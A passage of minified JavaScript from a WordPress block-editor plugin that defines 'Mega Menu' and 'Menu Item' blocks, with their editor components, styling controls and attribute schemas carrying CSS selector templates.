.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { color:{{iconColor}} }'}]},iconColorHvr:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { color:{{iconColorHvr}} }'}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-list-menu-wrapper {z-index:{{advanceZindex}};}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},72874:(e,t,l)=>{"use strict";l.d(t,{Z:()=>x});var o=l(87462),a=l(67294),i=l(99838),n=l(87763),r=l(22278);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,BlockControls:c}=wp.blockEditor,{ToolbarGroup:u,ToolbarButton:d}=wp.components,{useState:m,useEffect:g,useRef:y,Fragment:b,useMemo:v}=wp.element,{dispatch:h}=wp.data,{getBlockAttributes:f,getBlockParents:k,getBlockCount:w}=wp.data.select("core/block-editor");function x(e){const t=y(null),[l,x]=m("Content"),{setAttributes:T,name:_,className:C,attributes:E,clientId:S,attributes:{blockId:P,advanceId:L,megaWidthType:I,megaParentBlock:B,megaAlign:U}}=e,M={setAttributes:T,name:_,attributes:E,setSection:x,section:l,clientId:S};g((()=>{const e=S.substr(0,6);P?P&&P!=e&&T({blockId:e}):T({blockId:e}),A("setTimeout"),setTimeout((()=>{A("setTimeout");const e=document.querySelector(".editor-styles-wrapper"),t=new ResizeObserver((e=>{A("resizeObserver")}));e&&t.observe(e)}),1e3),document.addEventListener("click",(function(e){A("click")}))}),[S]);const A=e=>{const t=document.querySelectorAll(".wp-block-ultimate-post-menu-item.hasMegaMenuChild > .ultp-menu-item-wrapper > .ultp-menu-item-content");t.length>0&&t.forEach((function(e){if(e?.classList.contains("ultpMegaWindowWidth")){const t=document.querySelector(".editor-styles-wrapper"),l=t?t.offsetWidth:800,o=t?t.getBoundingClientRect().left:0,a=e.getBoundingClientRect().left,i=e.querySelector(" .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper");i&&(i.style.maxWidth=`${l}px`,i.style.boxSizing="border-box");const n=e.querySelector(" .block-editor-inner-blocks");n&&(n.style.left=`-${a-o}px`)}else if(e?.classList.contains("ultpMegaMenuWidth")){const t=e.closest(".wp-block-ultimate-post-menu"),l=t?t.offsetWidth:800,o=t?t.getBoundingClientRect().left:0,a=e.getBoundingClientRect().left,i=e.querySelector(" .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper");i&&(i.style.maxWidth=`${l}px`,i.style.boxSizing="border-box");const n=e.querySelector(".block-editor-inner-blocks");n&&(n.style.left=`-${a-o}px`)}else{const t=e?.querySelector(".block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper");t&&(t.style.maxWidth="",t.style.boxSizing="");const l=e?.querySelector(".block-editor-inner-blocks");l&&(l.style.left="")}}))};g((()=>{const e=t.current,l=k(S);e?t.megaWidthType!=I&&(h("core/block-editor").updateBlockAttributes(l[l.length-1],{megaWidthType:I}),t.current=E):t.current=E;const{parentBlock:o}=f(l[l.length-1])||{};B!=o&&T({megaParentBlock:o})}),[E]);const H=v((()=>(0,i.Kh)(E,"ultimate-post/mega-menu",P,!1)),[E,S]),N=w(S);return(0,a.createElement)(b,null,(0,a.createElement)(c,null,(0,a.createElement)(u,null,(0,a.createElement)(d,{label:"Delete Mega Menu",icon:n.Z.delete,onClick:()=>{wp.data.dispatch("core/block-editor").removeBlock(S,!0)}}))),(0,a.createElement)(s,null,(0,a.createElement)(r.g,{store:M})),(0,a.createElement)("div",(0,o.Z)({},L&&{id:L},{className:`ultp-block-${P} ${C} ultpMenuCss`}),H&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:H}}),(0,a.createElement)("div",{className:"ultp-mega-menu-wrapper"},(0,a.createElement)("div",{className:`ultp-mega-menu-content _${U}`},(0,a.createElement)(p,{templateLock:!1,renderAppender:N?void 0:()=>(0,a.createElement)(p.ButtonBlockAppender,null)})))))}},30891:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,megaAlign:n}=e.attributes,r={},s=Object.keys(r);return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,className:`ultp-block-${t} ultpMenuCss`},s&&r),(0,a.createElement)("div",{className:"ultp-mega-menu-wrapper"},(0,a.createElement)("div",{className:`ultp-mega-menu-content _${n}`},(0,a.createElement)(i.Content,null))))}},22278:(e,t,l)=>{"use strict";l.d(t,{g:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"alignment",key:"megaAlign",block:"mega-menu",disableJustify:!0,icons:["left","center","right"],options:["left","center","right"],label:__("Alignment","ultimate-post")}},{position:10,data:{type:"select",key:"megaWidthType",label:__("Width Type","ultimate-post"),options:[{value:"windowWidth",label:__("Window Width","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")},{value:"parentMenuWidth",label:__("Parent Menu Width","ultimate-post")}]}},{position:20,data:{type:"range",key:"megaWidth",min:0,max:1800,step:1,responsive:!0,unit:["px"],label:__("Width","ultimate-post")}},{position:30,data:{type:"range",key:"megaContentWidth",min:0,max:1800,step:1,responsive:!0,unit:["px"],label:__("Content Max Width","ultimate-post")}},{position:40,data:{type:"color2",key:"megaBg",image:!0,label:__("Background","ultimate-post")}},{position:50,data:{type:"border",key:"megaBorder",label:__("Border","ultimate-post")}},{position:55,data:{type:"boxshadow",key:"megaShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}},{position:60,data:{type:"dimension",key:"megaRadius",step:1,unit:!0,responsive:!0,label:__("Radius","ultimate-post")}},{position:70,data:{type:"dimension",key:"megaPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},37216:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(72874),n=l(30891);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/menu/","block_docs"),r("ultimate-post/mega-menu",{title:__("Mega Menu","ultimate-post"),parent:["ultimate-post/menu-item"],icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section ultp-megamenu-pro-icon"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/mega_menu.svg",alt:"Mega Menu"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Build Advanced and Engaging Multi-Level Menu.","ultimate-post")),keywords:[__("menu","ultimate-post"),__("mega","ultimate-post"),__("mega menu","ultimate-post")],supports:{html:!1,reusable:!1,align:[]},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},previewImg:{type:"string",default:""},megaParentBlock:{type:"string",default:""},megaAlign:{type:"string",default:"center"},megaWidthType:{type:"string",default:"custom",style:[{depends:[{key:"megaParentBlock",condition:"==",value:"hasMenuParent"}]},{depends:[{key:"megaWidthType",condition:"==",value:"windowWidth"}],selector:"{{ULTP}} > .ultp-mega-menu-wrapper { width: 100vw; }"},{depends:[{key:"megaWidthType",condition:"==",value:"parentMenuWidth"}],selector:"{{ULTP}} > .ultp-mega-menu-wrapper { width: 100vw; }"}]},megaWidth:{type:"object",default:{lg:"400",ulg:"px"},style:[{depends:[{key:"megaWidthType",condition:"==",value:"custom"}],selector:"{{ULTP}} > .ultp-mega-menu-wrapper { width: {{megaWidth}}; }"}]},megaContentWidth:{type:"object",default:{lg:"400",ulg:"px"},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper > .ultp-mega-menu-content { max-width: {{megaContentWidth}}; }"}]},megaBg:{type:"object",default:{openColor:1,type:"color",color:"#F5F5F5",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper"}]},megaBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#D2D2D2"},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper"}]},megaShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper"}]},megaPadding:{type:"object",default:{lg:{top:16,bottom:16,left:16,right:16,unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper { padding:{{megaPadding}}; }"}]},megaRadius:{type:"object",default:{lg:{top:4,bottom:4,left:4,right:4,unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper { border-radius:{{megaRadius}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper { z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},94965:(e,t,l)=>{"use strict";l.d(t,{Z:()=>C});var o=l(87462),a=l(67294),i=l(99838),n=l(87763),r=l(64766),s=l(35051);const{__}=wp.i18n,{InspectorControls:p,InnerBlocks:c,RichText:u,BlockControls:d}=wp.blockEditor,{Fragment:m,useState:g,useEffect:y,useMemo:b}=wp.element,{Dropdown:v,Toolbar:h,ToolbarButton:f}=wp.components,{getBlockAttributes:k,getBlockParents:w,getBlockCount:x,getBlocks:T,getBlockName:_}=wp.data.select("core/block-editor");function C(e){const[t,l]=g("Content"),{setAttributes:h,name:f,className:C,attributes:E,clientId:S,attributes:{previewImg:P,blockId:L,advanceId:I,menuItemText:B,hasChildBlock:U,childBlock:M,parentBlock:A,childMegaWidth:H,parentDropIcon:N,iconAfterText:j,enableBadge:Z,badgeText:O,parentBid:R,menuIconType:D,menuItemIcon:z,menuItemImg:F,menuItemSvg:W,parentMenuInline:V}}=e,G={setAttributes:h,name:f,attributes:E,setSection:l,section:t,clientId:S};y((()=>{const e=S.substr(0,6);L?L&&L!=e&&h({blockId:e}):h({blockId:e})}),[S]),y((()=>{const e=w(S),t=e[e.length-1],l=T(S),o=l[0]?.name||"",{megaWidthType:a}=l[0]?l[0].attributes:{},i=t?_(t):"",{menuInline:n,dropIcon:r,iconAfterText:s,blockId:p}=k(e[e.length-1])||{},c="ultimate-post/menu"==i?"hasMenuParent":"ultimate-post/list-menu"==i?"hasListMenuParent":"",u="ultimate-post/mega-menu"==o?"hasMegaMenuChild":"ultimate-post/list-menu"==o?"hasListMenuChild":"",d="windowWidth"==a?"ultpMegaWindowWidth":"parentMenuWidth"==a?"ultpMegaMenuWidth":"ultpMegaCustomWidth",m=l.length>0,g=null!=n&&n,y=s,b=`.ultp-block-${p||"null"}`,v={...A!=c&&{parentBlock:c},...M!=u&&{childBlock:u},...H!=d&&{childMegaWidth:d},...U!=m&&{hasChildBlock:m},...V!=g&&{parentMenuInline:g},...N!=r&&{parentDropIcon:r},...E.iconAfterText!=y&&{iconAfterText:y},...R!=b&&{parentBid:b}};Object.keys(v).length>0&&h(v)}),[E]);const q=b((()=>(0,i.Kh)(E,"ultimate-post/menu-item",L,!1)),[E,S]);if(P)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:P});const $=x(S)>0;let K;return $!=U&&h({hasChildBlock:$}),"img"==D?K=(0,a.createElement)("img",{src:F?.url||"#",alt:"Menu Item Image"}):"icon"==D?K=r.ZP[z]:"svg"==D&&(K=W),(0,a.createElement)(m,null,(0,a.createElement)(d,null,(0,a.createElement)(s.m,{isSelected:e.isSelected,clientId:S,store:G,__hasChildBlock:$})),(0,a.createElement)(p,null,(0,a.createElement)(s.T,{clientId:S,store:G})),(0,a.createElement)("div",(0,o.Z)({},I&&{id:I},{className:`ultp-block-${L} ${C} ${A} ${M} ultpMenuCss`}),q&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:q}}),(0,a.createElement)("div",{"data-parentbid":R,className:"ultp-menu-item-wrapper"},(0,a.createElement)("div",{className:"ultp-menu-item-label-container"},(0,a.createElement)("a",{style:{pointerEvents:"none"},className:"ultp-menu-item-label ultp-menuitem-pos-"+(j?"aft":"bef")},e.isSelected||""==B?(0,a.createElement)(u,{key:"editable",isSelected:!1,tagName:"div",className:"ultp-menu-item-label-text",placeholder:__("Item Text…","ultimate-post"),onChange:e=>h({menuItemText:e}),value:B}):(0,a.createElement)("div",{className:"ultp-menu-item-label-text"},B),K&&("svg"==D?(0,a.createElement)("div",{className:"ultp-menu-item-icon",dangerouslySetInnerHTML:{__html:K}}):(0,a.createElement)("div",{className:"ultp-menu-item-icon"},K)),Z&&(0,a.createElement)("div",{"data-currentbid":`.ultp-block-${L}`,className:"ultp-menu-item-badge"},O)),N&&(0,a.createElement)("div",{className:"ultp-menu-item-dropdown"},$&&r.ZP[N])),(0,a.createElement)("div",{className:`ultp-menu-item-content ${H}`},(0,a.createElement)(c,{renderAppender:!$&&!!e.isSelected&&(()=>(0,a.createElement)(v,{contentClassName:"ultp-menu-add-toolbar",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,a.createElement)("div",{className:"ultp-listmenu-add-item",onClick:()=>e()},n.Z.plus,(0,a.createElement)("div",{className:"__label"},__("Sub Menu","ultimate-post"))),renderContent:({onClose:e})=>(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-items"},(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-item",onClick:()=>{wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/list-menu",{}),0,S),e()}},(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-img"},(0,a.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/list_menu.svg",alt:"List Menu"})),(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-label"},__("List Menu","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-item",onClick:()=>{wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/mega-menu",{}),0,S),e()}},(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-img ultp-megamenu-pro-icon"},(0,a.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/mega_menu.svg",alt:"Mega Menu"}),!ultp_data.active&&(0,a.createElement)("span",{className:"ultp-pro-block"},"Pro")),(0,a.createElement)("div",{className:"ultp-toolbar-menu-block-label"},__("Mega Menu","ultimate-post"))))})),allowedBlocks:["ultimate-post/list-menu","ultimate-post/mega-menu"]})))))}},48396:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,menuItemText:n,hasChildBlock:r,parentBlock:s,childBlock:p,childMegaWidth:c,iconAfterText:u,parentDropIcon:d,menuItemLink:m,menuLinkTarget:g,enableBadge:y,badgeText:b,parentBid:v,menuIconType:h,menuItemIcon:f,menuItemImg:k,menuItemSvg:w}=e.attributes;let x;"img"==h?x=(0,a.createElement)("img",{src:k?.url||"#",alt:"Menu Item Image"}):"icon"==h?x=f?"_ultp_mi_ic_"+f+"_ultp_mi_ic_end_":"":"svg"==h&&(x=w);const T={},_=Object.keys(T);return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,className:`ultp-block-${t} ${s} ${p} ultpMenuCss`},_&&T),(0,a.createElement)("div",{"data-parentbid":v,className:"ultp-menu-item-wrapper"},(0,a.createElement)("div",{className:"ultp-menu-item-label-container"},(0,a.createElement)("a",(0,o.Z)({className:"ultp-menu-item-label ultp-menuitem-pos-"+(u?"aft":"bef")},m&&{href:m,target:g,rel:"noopener"}),n&&(0,a.createElement)("div",{className:"ultp-menu-item-label-text"},n),x&&("svg"==h?(0,a.createElement)("div",{className:"ultp-menu-item-icon",dangerouslySetInnerHTML:{__html:x}}):(0,a.createElement)("div",{className:"ultp-menu-item-icon"},x)),y&&(0,a.createElement)("div",{"data-currentbid":`.ultp-block-${t}`,className:"ultp-menu-item-badge"},b)),d&&(0,a.createElement)("div",{className:"ultp-menu-item-dropdown"},r&&"_ultp_mi_ic_"+d+"_ultp_mi_ic_end_")),(0,a.createElement)("div",{className:`ultp-menu-item-content ${c}`},(0,a.createElement)(i.Content,null))))}},35051:(e,t,l)=>{"use strict";l.d(t,{T:()=>u,m:()=>c});var o=l(67294),a=l(53049),i=l(87763),n=l(92637);const{__}=wp.i18n,{Dropdown:r,ToolbarGroup:s,ToolbarButton:p}=wp.components,c=e=>{const{clientId:t,isSelected:l,store:n}=e;return(0,o.createElement)(o.Fragment,null,l&&(0,o.createElement)(s,{className:"ultp-menu-toolbar-group"},(0,o.createElement)(r,{contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Update Link",icon:i.Z.updateLink,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"text",key:"menuItemText",label:"Label"}},{position:10,data:{type:"linkbutton",key:"menuItemLink",onlyLink:!0,extraBtnAttr:{target:{key:"menuLinkTarget",options:[{value:"_self",label:__("Same Tab","ultimate-post")},{value:"_blank",label:__("New Tab","ultimate-post")}],label:__("Link Target To","ultimate-post")},follow:!1,sponsored:!1,download:!1},label:__("Link","ultimate-post")}}],initialOpen:!0,store:n})})),(0,o.createElement)(s,null,(0,o.createElement)(r,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Style",icon:i.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:n})})),(0,o.createElement)(s,null,(0,o.createElement)(p,{label:"Duplicate",icon:i.Z.duplicate,onClick:()=>{wp.data.dispatch("core/block-editor").duplicateBlocks([t],!0)}})),(0,o.createElement)(s,null,(0,o.createElement)(p,{label:"Delete Item",icon:i.Z.delete,onClick:()=>{wp.data.dispatch("core/block-editor").removeBlock(t,!0)}})))},u=({store:e,clientId:t})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:5,data:{type:"text",key:"menuItemText",label:"Label"}},{position:10,data:{type:"linkbutton",key:"menuItemLink",onlyLink:!0,extraBtnAttr:{target:{key:"menuLinkTarget",options:[{value:"_self",label:__("Same Tab","ultimate-post")},{value:"_blank",label:__("New Tab","ultimate-post")}],label:__("Link Target To","ultimate-post")},follow:!1,sponsored:!1,download:!1},label:__("Link","ultimate-post")}},{position:40,data:{type:"tag",key:"menuIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"img",label:__("Image","ultimate-post")},{value:"svg",label:__("Custom svg","ultimate-post")}]}},{position:50,data:{type:"icon",key:"menuItemIcon",label:__("Icon","ultimate-post")}},{position:60,data:{type:"media",key:"menuItemImg",label:__("Image","ultimate-post")}},{position:70,data:{type:"textarea",key:"menuItemSvg",label:__("SVG code","ultimate-post")}},{position:80,data:{type:"tag",key:"menuItemImgScale",label:__("Image scale","ultimate-post"),options:[{value:"",label:__("None","ultimate-post")},{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Contain","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}]}},{position:90,data:{type:"dimension",key:"menuItemImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Badge","ultimate-post"),depend:"enableBadge",include:[{position:5,data:{type:"text",key:"badgeText",label:__("Badge Label","ultimate-post")}},{position:10,data:{type:"typography",key:"badgeTypo",label:__("Typography","ultimate-post")}},{position:20,data:{type:"color",key:"badgeColor",label:__("Color","ultimate-post")}},{position:30,data:{type:"color2",key:"badgeBg",label:__("Background","ultimate-post")}},{position:40,data:{type:"border",key:"badgeBorder",label:__("Border","ultimate-post")}},{position:50,data:{type:"dimension",key:"badgeRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:60,data:{type:"dimension",key:"badgePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:70,data:{type:"tag",key:"badgePosition",label:__("Badge Position","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")},{value:"left",label:__("Left","ultimate-post")}]}},{position:80,data:{type:"range",key:"badgePositionValue",label:__("Position Adjustment","ultimate-post"),step:1,unit:["px","%"],responsive:!0,min:-200,max:200}},{position:90,data:{type:"range",key:"badgeSpacing",label:__("Gap Between Label and Badge","ultimate-post"),step:1,unit:["px","%"],responsive:!0,min:0,max:200}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Item Style","ultimate-post"),include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content Position","ultimate-post"),include:[{position:40,data:{type:"tag",key:"contentHorizontalPositionType",label:__("Horizontal Position","ultimate-post"),options:[{value:"toLeft",label:__("To Left","ultimate-post")},{value:"toRight",label:__("To Right","ultimate-post")}]}},{position:50,data:{type:"range",key:"contentHorizontalPosition",min:0,max:1200,step:1,responsive:!0,unit:["px"],label:__("Horizontal Position Value","ultimate-post")}},{position:60,data:{type:"tag",key:"contentVerticalPositionType",label:__("Vertical Position","ultimate-post"),options:[{value:"toTop",label:__("To Top","ultimate-post")},{value:"toBottom",label:__("To Bottom","ultimate-post")}]}},{position:70,data:{type:"range",key:"contentVerticalPosition",min:0,max:1200,step:1,responsive:!0,unit:["px"],label:__("Vertical Position Value","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},7004:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(94965),n=l(48396);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/menu/","block_docs"),r("ultimate-post/menu-item",{title:__("Menu Item","ultimate-post"),parent:["ultimate-post/menu","ultimate-post/list-menu"],icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/menu_item.svg",alt:"Menu Item"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Edit and Optimize Individual Menu Items.","ultimate-post")),keywords:[__("menu","ultimate-post"),__("item","ultimate-post")],supports:{html:!1,reusable:!1},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},previewImg:{type:"string",default:""},parentMenuInline:{type:"boolean",default:!0},hasChildBlock:{type:"boolean",default:!1},parentBlock:{type:"string",default:""},childBlock:{type:"string",default:""},childMegaWidth:{type:"string",default:""},parentDropIcon:{type:"string",default:"collapse_bottom_line"},iconAfterText:{type:"boolean",default:!1},parentBid:{type:"string",default:""},menuItemText:{type:"string",default:"List Item"},menuItemLink:{type:"string",default:""},menuLinkTarget:{type:"string",default:"_self"},menuIconType:{type:"string",default:"icon"},menuItemIcon:{type:"string",default:"",style:[{depends:[{key:"menuIconType",condition:"==",value:"icon"}]}]},menuItemImg:{type:"object",default:"",style:[{depends:[{key:"menuIconType",condition:"==",value:"img"}]}]},menuItemSvg:{type:"string",default:"",style:[{depends:[{key:"menuIconType",condition:"==",value:"svg"}]}]},menuItemImgScale:{type:"string",default:"cover",style:[{depends:[{key:"menuIconType",condition:"==",value:"img"}],selector:"{{ULTP}} > .ultp-menu-item-wrapper .ultp-menu-item-label-container .ultp-menu-item-icon img {object-fit: {{menuItemImgScale}};}"}]},menuItemImgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"menuIconType",condition:"==",value:"img"}],selector:"{{ULTP}} > .ultp-menu-item-wrapper .ultp-menu-item-label-container .ultp-menu-item-icon img {border-radius: {{menuItemImgRadius}};}"}]},contentHorizontalPositionType:{type:"string",default:"toRight",style:[{depends:[{key:"parentMenuInline",condition:"==",value:!0}]},{depends:[{key:"parentBlock",condition:"==",value:"hasListMenuParent"}]}]},contentHorizontalPosition:{type:"object",default:{lg:"16",ulg:"px"},style:[{depends:[{key:"parentMenuInline",condition:"==",value:!0},{key:"contentHorizontalPositionType",condition:"==",value:"toRight"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 0% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% - {{contentHorizontalPosition}} ); width: calc( 100% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!0},{key:"contentHorizontalPositionType",condition:"==",value:"toLeft"}],selector:"{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 100% - {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% + 0px ); width: calc( 0% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!1},{key:"parentBlock",condition:"!=",value:"hasListMenuParent"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 100% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > 